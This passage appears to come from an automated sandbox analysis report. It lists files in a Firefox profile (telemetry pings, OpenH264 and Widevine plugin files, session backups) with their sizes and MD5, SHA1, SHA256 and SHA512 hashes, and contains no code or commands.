SHA1766a7e0a912cf9143282fc5fe108f1a901df137a
SHA256db18475becf9b7057e62b80238e5c1fe39855bcba8787729861c1f9e53899eb2
SHA512ea115c48f59f63d26d2b4af710b557add5e02dd87b387a63dbe681b0406229582b2c4ac41864b22d9ba828583f9ad168b027c896df1cf6e9b2c243b305fc40b3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\datareporting\glean\pending_pings\bf820c4a-19b5-4409-b8d7-80599dbd042f
Filesize10KB
MD56f0c2bc7ff1cccebf4b18f5932523b67
SHA1e90254702c1aadbfc7f2799f01f9776c460160b6
SHA25630aec9fa0b58a5d0903539ad33db5cae3626807808fa5ee293461a0b7f007246
SHA512dabf6ce939541c2ca414aa6b4b991f5ed6ffde4c0b309adc2bcf392c48426e767895f0482d82a2a215e473ec9a1194d965052862816c90530b5a28cb2d246695
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
Filesize
7KB
MD55a60e727efa4df83775229a1776fb7da
SHA16df732010c4f0249b0cc968901f1190e6a3c806a
SHA2569626d2599faab8c7f7b780ced9bfc32ec0f4bed698e7ff5c9b597b5371b667da
SHA51274e648ae1c5e971025e1fb83fb639ca15d0ff1d6b8ce01832c990ff14a3bad2c5f0798f2523b7d13a51e79330f514f6666d79622e661d064b5ddc90704230af0
-
Filesize
6KB
MD5083c8e1a663f601123e531da9f5f9b38
SHA193d5ba64d50cac5e95934729c44ff098fc9b6d14
SHA256eb9379ad40d6ddcdbe0bcc1450be3577a663d98ecb1d294b8202ec66da5009ea
SHA5128f1d1b6b1b16ab1e1f6c4ba518589f3334bb41854d19e359382b8bf2d8373565c0a285f9bd72a01110a71ff28cf056e65bda828c8021f4437063eb04b69f589e
-
Filesize
6KB
MD58730ec011f07b9969e5983e1a126c29c
SHA114888d827e3e991bbf8338941bae640dd526065b
SHA2563065bcd3e2d5a1e072481e39398d51f26166062f383aae377047e71871377a7c
SHA5124d1a657eda323f391561d19ec7f6244df7c0b87323c69cc93d2084fb82f4bd5b21907642f6088f1d5a5c63a89f98abc4ab308d45685d9062c7768057f5136799
-
Filesize
6KB
MD500fb4ec57d18c5e80df5da7d5e0d677f
SHA16d85679d46a7e94da6ad5d42f40a09465b655a39
SHA256360b59e5fa64a7f794edca4474b955a0ae139737244a32586bf849003659c002
SHA51214c7ae3e7e244f62df7f943e63687ea2b6ca236482ff328344d91cf8307a2c4ba5072c1343e08309af264a3ff24dabb05d9a6270da529ec901d57c2dfb809917
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5d8ef50fcffeb8bfefa875d5fe544d94b
SHA1e3d651c428a9ccbe09d555f9c151dd6bebb2370d
SHA25672e6beb14bd39d0a3e3040115445d0f1865e271d7dad09ff0123d883ee7fe5e7
SHA51292698bd9933fabe6607b37c25562a3d1e618311ddbba59c3797c12477eca35f3607d56814f926c6604473da53227b351ccf87d093b0609b79a9b49e3e84df510
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5bece0acf9d7f19d01c7943c54d2ad372
SHA1aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b
-
Filesize
1.8MB
MD5b3e97ce9c375f569804656f6a51e1d96
SHA1b53762eebc98deb7d9edf1d10fed7abdd23b3a0d
SHA2569e66a4ee42df8cebd60411b1d3c0ca7b5fabf17466180d05c566b0be4ea315d6
SHA512fe1db6858fba2315908c5149ef8f0fc55d8e025d135366e6aa015b3a1d1e4969f41f00d72e3af6347c9e0f6a602d93467358ade88093b19c5d72fe163eea2319
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502